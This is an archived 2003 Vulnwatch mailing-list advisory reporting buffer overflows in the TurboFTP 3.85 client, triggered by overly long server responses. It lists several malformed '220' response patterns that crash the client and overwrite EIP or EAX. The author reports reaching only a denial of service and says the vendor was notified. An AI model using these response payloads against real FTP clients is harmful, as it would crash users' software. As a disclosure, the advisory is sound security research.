Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Buffer Overflow Vulnerabilities in TurboFTP

From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Thu, 10 Jul 2003 21:01:12 +0000
Buffer Overflow Vulnerabilities in TurboFTP

Url: http://www.turboftp.com


From the vendor's website ...


        "TurboFTP is a secure FTP client program for Windows
9x/ME/NT4/2000/XP. It allows you to transfer files (upload or
download) at turbo speed between your computer and virtually
any FTP server with exceptional ease."

        "With an intuitive user interface, a wealth of features
and secure file transfer capability, TurboFTP is the right
software tool for tasks like uploading Web site, scheduled file
synchronization and backup, and mission critical corporate file
transfers."

And I certainly can't argue with that, It's certainly in my top
twenty FTP clients list!

It is also vulnerable to a buffer overflow attack from a
malicious ftp server sending an overly long response upon
at any time during the connection.

The data being supplied by the server is placed, unicoded, into
a buffer of length around 1000 bytes long.
This means that normal buffer overflow attack techniques cannot
be used to exploit this vulnerability.

Interesting responses:

(TurboFTP connected...)
220 [1061xA]
(Access violation in user32.dll)

(TurboFTP connected...)
    PADDING    EIP
220 [1061xA][*][2xX] // Totalling 1063 Bytes
(Access violation in turboftp.exe when executing 0x00580058)
// 2xX Unicoded

* The base pointer register cannot be altered as far as I can see,
thus the reason I have not included it.

(TurboFTP connected...)
    PADDING
220 [8000xA]
(Access violation in comctl32.dll)

(TurboFTP connected...)
    PADDING EAX
220 [8574xA][4xX] // Totalling 8578 Bytes
(Access violation in turboftp.exe; EAX = 0x58585858)

I could not find an address which my buffer could write to
on the stack which was similar to:

0x00SS00??

Where SS is an address on the stack, thus I was unable to exploit
the vulnerability to any extent past that of a simple DoS attack.

If anyone manages this, I would be most interested to hear how
it was achieved.

Never the less I have contacted the vendor, and they may issue
a patch if this is found to be anything which could lead to a
remote system compromise or code execution of any type.

======================================================================


Operating system and servicepack level:
Windows 9x/Me/NT Based


Software:
TurboFTP 3.85 Build 304 (Possibly Earlier Versions)


Under what circumstances the vulnerability was discovered:
Under a vulnerability search.


If the vendor has been notified:
Yes, the vendor had been notified.


How to contact you for further information:
I can always be reached at peter4020 () hotmail com


Please credit this find to:
Peter Winter-Smith


Thank you for your time,
-Peter

_________________________________________________________________
Stay in touch with absent friends - get MSN Messenger http://www.msn.co.uk/messenger
Previous By Date Next
Previous By Thread Next

Current thread: